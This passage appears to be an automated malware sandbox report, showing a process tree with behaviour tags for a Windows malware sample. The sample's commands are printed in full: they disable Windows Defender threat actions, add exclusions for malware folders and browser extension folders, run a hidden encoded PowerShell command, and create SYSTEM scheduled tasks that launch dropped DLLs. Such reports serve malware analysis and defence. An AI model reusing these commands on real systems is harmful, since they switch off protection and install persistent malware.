Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:2296
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3164
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1980
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2804
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2144
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3608
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:980
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4500
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1972
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:900
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5112
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3280
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3372
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2248
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4672
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4936
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4256
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4820 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1980
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵PID:1992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵PID:3292
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵PID:2956
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵PID:1020
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵PID:3984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵PID:4696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵PID:2320
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵PID:72
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵PID:496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵PID:236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵PID:4008
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵PID:4584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵PID:4348
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3564
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3552
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3740
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4844
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵PID:4832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵PID:2344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵PID:2720
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:643⤵PID:3928
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glZmftfLp" /SC once /ST 04:41:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3356 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glZmftfLp"2⤵PID:404
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2144
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glZmftfLp"2⤵PID:2732
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 07:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe\" aV /iRHVdidlr 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:560 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵PID:4788
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3292
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1152
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4236
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵
- Executes dropped EXE
PID:2772
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Executes dropped EXE
PID:3896
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe aV /iRHVdidlr 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4500
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:684
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2152
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3908
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:2956
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:4492
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4236
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:3756
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4624
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3164
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:2344
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2164
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:244
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4452
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:2092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2804 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:1168
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"2⤵PID:3056
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:576
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4340
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1284
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4352 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:4688
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\YPGQWq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\sAfEORO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1196 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JHJXtPPPvDXVqpH"2⤵PID:4256
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"2⤵PID:4904
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\kvuTHLF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1980 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\UFvFvWg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4404 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qqjiZcs.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4020 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\AIHTAaQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:72 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 08:09:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\ievSKAac\KBhwNqJ.dll\",#1 /BdidWxA 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2696 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aNyMQclguOCSCcjxm"2⤵PID:4688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4296
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\ievSKAac\KBhwNqJ.dll",#1 /BdidWxA 3851181⤵PID:2732
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\ievSKAac\KBhwNqJ.dll",#1 /BdidWxA 3851182⤵
- Blocklisted process makes network request
